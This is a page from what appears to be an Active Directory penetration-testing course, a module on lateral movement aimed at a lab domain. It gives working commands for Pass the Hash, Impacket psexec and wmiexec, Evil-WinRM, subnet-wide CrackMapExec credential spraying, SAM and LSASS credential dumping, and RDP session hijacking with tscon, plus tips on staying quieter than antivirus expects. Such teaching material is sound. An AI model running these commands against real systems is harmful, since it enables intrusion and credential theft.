← Home
Home  /  Course  /  Module 06
Module 06 · AD Pentesting Course

Lateral Movement

You have a foothold and credentials. Now you need to move through the network — reaching machines where higher-privilege users are logged in, or where sensitive data lives. This module covers the primary lateral movement techniques in Windows environments: Pass the Hash, remote execution via WMI/PSExec/WinRM/DCOM, RDP session hijacking, and using CrackMapExec to systematically map and move across the domain.

Lateral Movement Techniques
Pass the Hash
Protocol: NTLM / SMB
Authenticate using an NTLM hash instead of a plaintext password. No cracking required. Works against any NTLM-authenticated service.
PSExec
Protocol: SMB (TCP 445)
Deploy a service binary via SMB ADMIN$ share. Returns an interactive SYSTEM shell. Loud — creates service events in the event log.
WMI Exec
Protocol: DCOM/RPC (TCP 135)
Execute commands via Windows Management Instrumentation. Semi-interactive. Less noisy than PSExec — no service creation.
WinRM
Protocol: HTTP/HTTPS (5985/5986)
Windows Remote Management — PowerShell remoting. Clean interactive shell. Requires the target to have WinRM enabled (default on Server 2012+).
DCOM
Protocol: DCOM/RPC
Execute methods on COM objects remotely. Multiple execution vectors (MMC20, ShellWindows). Stealthy but complex.
RDP Hijacking
Protocol: RDP (TCP 3389)
Attach to disconnected RDP sessions as SYSTEM without the original user's password. Requires SYSTEM on the target.
Pass the Hash (PtH)

Authenticating with an NTLM Hash

NTLM authentication exchanges can be completed with just the password hash — the protocol was designed this way for backward compatibility. If you have a user's NTLM hash (from SAM dump, LSASS dump, or DCSync), you can authenticate as that user to any NTLM-accepting service without ever knowing the plaintext password.

This works against: SMB shares, PsExec, WMI, WinRM (in older configurations), and some web applications. It does not work for interactive GUI logons, or services that use Kerberos exclusively.

# Pass the Hash with CrackMapExec — test access kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:<ntlm-hash> # Get a shell via Impacket's psexec with a hash kali@kali:~$ impacket-psexec meridianfg.local/Administrator@192.168.1.10 -hashes :<ntlm-hash> # WMI exec with hash kali@kali:~$ impacket-wmiexec meridianfg.local/Administrator@192.168.1.20 -hashes :<ntlm-hash> # Evil-WinRM with hash kali@kali:~$ evil-winrm -i 192.168.1.20 -u Administrator -H <ntlm-hash>
Pass the Hash against local Administrator accounts is blocked by UAC's remote token filtering (KB2871997) on modern Windows — only the built-in Administrator (RID 500) account is exempt. Domain accounts are unaffected by this restriction. Always prefer domain account hashes when targeting workstations.
When CME outputs Pwn3d! for a host, you have local admin access — run --sam to dump SAM hashes or --lsa to dump LSA secrets immediately. Harvested hashes from one machine can grant access to others (credential reuse is common).
Remote Execution Methods

PSExec — SMB Service-Based Shell

PSExec (Impacket's implementation) copies a randomly-named service binary to the target's ADMIN$ share, registers it as a Windows service, starts it to get a SYSTEM shell, then cleans up. It requires: local admin access, SMB (TCP 445) open, and ADMIN$ share accessible.

kali@kali:~$ impacket-psexec meridianfg.local/administrator:Admin123!@192.168.1.20 kali@kali:~$ impacket-psexec meridianfg.local/administrator@192.168.1.20 -hashes :<hash>

WMI — Stealthier Execution

Windows Management Instrumentation allows running commands via DCOM on port 135 (dynamic RPC port range for data). Less noise than PSExec — no service creation event. The output is fetched via SMB, so port 445 is still needed for interactive use.

kali@kali:~$ impacket-wmiexec meridianfg.local/administrator:Admin123!@192.168.1.20 # Use -silentcommand for no output (pure fire-and-forget) kali@kali:~$ impacket-wmiexec meridianfg.local/administrator@192.168.1.20 -hashes :<hash> \ "powershell -enc <b64-payload>" -silentcommand

WinRM — PowerShell Remoting

WinRM (TCP 5985 HTTP, 5986 HTTPS) provides native PowerShell remoting. Evil-WinRM is the most convenient Kali client, offering a clean interactive shell, file upload/download, and in-memory PowerShell module loading.

# Connect with credentials kali@kali:~$ evil-winrm -i 192.168.1.20 -u administrator -p Admin123! # Connect with hash (Pass the Hash) kali@kali:~$ evil-winrm -i 192.168.1.20 -u administrator -H <ntlm-hash> # Upload a file to the target Evil-WinRM*> upload /path/to/local/file.ps1 C:\Temp\file.ps1 # Download a file from the target Evil-WinRM*> download C:\Temp\output.txt /tmp/output.txt
CrackMapExec for Lateral Movement

Systematic Movement and Credential Spraying

CrackMapExec lets you test a credential (or hash) against your full subnet in seconds, execute commands on multiple hosts at once, and harvest further credentials from each compromised machine. It builds a picture of your lateral movement reach rapidly.

# Dump SAM hashes from all machines where you have admin kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u administrator -H <hash> --sam # Execute a command on all hosts where creds work kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u administrator -p Admin123! -x "whoami /priv" # List sessions — who else is logged in on each machine kali@kali:~$ crackmapexec smb 192.168.1.20 -u administrator -p Admin123! --sessions # Check for logged-in domain admins across all workstations kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u administrator -p Admin123! --loggedon-users | grep "Domain Admins" # Dump LSASS hashes (credential harvesting) kali@kali:~$ crackmapexec smb 192.168.1.20 -u administrator -p Admin123! -M lsassy
The lsassy module dumps LSASS in a variety of stealthy ways (procdump, comsvcs.dll, etc.) and extracts credentials without dropping a full memory dump file. It is more AV-friendly than running Mimikatz directly.
RDP Session Hijacking

Taking Over Disconnected Sessions as SYSTEM

When users disconnect from an RDP session instead of logging off, their session remains alive on the server. As SYSTEM, you can attach to any disconnected session using the built-in tscon utility — without needing the session owner's password. This is especially useful when a Domain Admin has a disconnected session on a machine you've already compromised.

# List RDP sessions on a target machine (from Kali with admin creds) kali@kali:~$ impacket-wmiexec administrator:Admin123!@192.168.1.20 "qwinsta" # Output example: SESSIONNAME USERNAME ID STATE TYPE DEVICE >console administrator 0 Active wdcon rdp-tcp#2 dwhite 2 Disc rdpwd (dwhite is disconnected — RDP session 2) # Hijack from an existing SYSTEM shell on the target C:\WINDOWS\system32> tscon 2 /dest:console

After running tscon, you are dropped into dwhite's desktop — without any authentication. From there, open a PowerShell prompt: you're acting as dwhite, with all their Kerberos tickets and access rights.

RDP hijacking requires you to be running as SYSTEM on the target. If you only have local admin, first escalate to SYSTEM via PsExec -s -i cmd or through a token impersonation technique (Module 07).
Check for disconnected Domain Admin sessions on all machines via CME --loggedon-users. A DA session on a workstation is a high-priority target — hijack it to move to the DC.
Related labs
Lab 01 — Meridian Financial Group Pass the Hash from WS01 to DC, establish persistence Module 05 — ACL Abuse Review ACL paths leading to lateral movement opportunities
← Module 05 — ACL Abuse Module 07 — Priv Esc (Soon) →